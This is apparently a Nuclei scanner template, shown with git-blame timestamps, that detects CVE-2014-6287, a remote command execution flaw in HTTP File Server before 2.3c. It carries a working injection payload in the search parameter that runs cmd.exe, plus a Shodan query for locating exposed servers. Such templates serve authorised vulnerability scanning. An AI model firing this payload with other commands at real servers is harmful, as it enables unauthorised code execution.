nuclei-templates/http/cves/2014/CVE-2014-6287.yaml

57 lines
1.8 KiB
YAML
Raw Normal View History

2023-04-01 18:50:04 +00:00
id: CVE-2014-6287
2023-04-01 18:50:04 +00:00
info:
name: HTTP File Server <2.3c - Remote Command Execution
2023-04-01 18:50:04 +00:00
author: j4vaovo
2023-04-01 19:05:20 +00:00
severity: critical
2023-04-01 18:50:04 +00:00
description: |
HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-04-01 18:50:04 +00:00
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
- http://www.kb.cert.org/vuls/id/251276
- http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html
- https://github.com/rapid7/metasploit-framework/pull/3793
- https://nvd.nist.gov/vuln/detail/CVE-2014-6287
2023-04-01 18:50:04 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-6287
cwe-id: CWE-94
cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:*
epss-score: 0.97414
2023-04-04 02:44:57 +00:00
metadata:
max-request: 1
2023-04-04 02:44:57 +00:00
shodan-query: http.favicon.hash:2124459909
verified: "true"
tags: packetstorm,msf,cve,cve2014,hfs,rce,kev
2023-04-01 18:50:04 +00:00
variables:
str1: '{{rand_base(6)}}'
2023-04-04 02:44:57 +00:00
str2: 'CVE-2014-6287'
2023-04-01 18:50:04 +00:00
http:
2023-04-01 18:50:04 +00:00
- method: GET
path:
2023-04-17 13:23:19 +00:00
- '{{BaseURL}}/?search==%00{.exec|cmd.exe+/c+ping+127.0.0.1+-n+10.}'
# - '{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}'
2023-04-01 18:50:04 +00:00
matchers-condition: and
matchers:
2023-04-04 02:44:57 +00:00
- type: word
part: body
words:
- '<title>HFS /</title>'
2023-04-01 18:50:04 +00:00
- type: word
part: header
words:
- 'Set-Cookie: {{str1}}={{str2}};'
- 'text/html'
condition: and
- type: status
status:
- 200
# Enhanced by md on 2023/04/12